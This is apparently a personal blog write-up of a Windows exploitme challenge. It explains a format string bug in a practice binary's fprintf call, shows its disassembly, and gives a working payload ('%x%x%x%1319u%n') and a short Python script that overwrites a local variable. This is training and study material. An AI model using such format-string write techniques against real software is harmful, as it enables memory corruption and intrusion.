Windows Exploitme: The Girl

Last time I mentioned that after completing Gerardo Richarte's Advanced Buffer Overflows challenge I wanted to make a incursion in Windows exploitation lands. As I said, I already had an eye on some juicy exploitmes for Windows for which I bring the first establishment. The exploitme in question is a simple exe file that performs a simple authentication procedure. Our mission this time will be to overwrite a local variable called id and make it print "1337". You can get the binary and my python written exploit from here. The vulnerability in question is a really simple Format String bug in one of the functions where it makes use of the fprintf() function without explicitly specifying a format; a textbook example. Let's take a look at the disassembly to get a deeper view:

.text:00401415                 push    ebp
.text:00401416                 mov     ebp, esp
.text:00401418                 sub     esp, 8
.text:0040141B                 mov     eax, [ebp+arg_8] ; id
.text:0040141E                 mov     dword ptr [eax], 0FFFFFFFFh
.text:00401424                 mov     eax, [ebp+arg_8]
.text:00401427                 cmp     dword ptr [eax], 0FFFFFFFFh
.text:0040142A                 jnz     short locret_401440
.text:0040142C                 mov     eax, [ebp+arg_0] ; load *username
.text:0040142F                 mov     [esp+8+var_4], eax
.text:00401433                 mov     eax, ds:dword_404090 ; load *fd pointer
.text:00401438                 mov     [esp+8+var_8], eax
.text:0040143B                 call    fprintfAs I said earlier, parameters are directly referenced without doing any kind of check. Now let's focus on how can we exploit this situation. If we run the executable inside a debugger and place a breakpoint in the right place (Placing it in 0x00401438 right next to the call to

fprintf()did the job for me) we can see in the stack dump area that the format is a couple of dwords after our parameters. To be more precise our id field is placed exactly 4 dwords after the format string (Remember, the format string itself is stored in the stack). Theory tells us that using "%x" as format we increase the esp by one dword because we would be popping a unsigned integer in hex. Therefore all we need to do is climb a couple of words in the stack and make a write using the "%n" format parameter. Since the objective in this exploit is to write "1337" in the id field and "%n" writes the amount of bytes read so far to the current esp address, we need to increase this amount to make it "1337" in decimal. For this purpose we will make use of the "%u" format parameter. Recapping, our username field will have to show "%x%x%x%1319u%n" for the exploit to succeed. Here's a python snippet that will do the job, a whole working script is also packed alongside the binary in the zip I linked in the beginning.

import os

username = "%x%x%x%1319u%n"+"\n"
password = "insertrandomsequencehere()"+"\n"
stdin,stdout=os.popen4("02-lizer-girl.exe")
stdin.write(username + password)

print stdout.read(100)That's it. Not a though guy this time, I just wanted to tinker a little bit in windows and get used to the new tools. Hope you guys enjoyed it as much as I did, see you around and don't forget to keep adding NOPs! :-)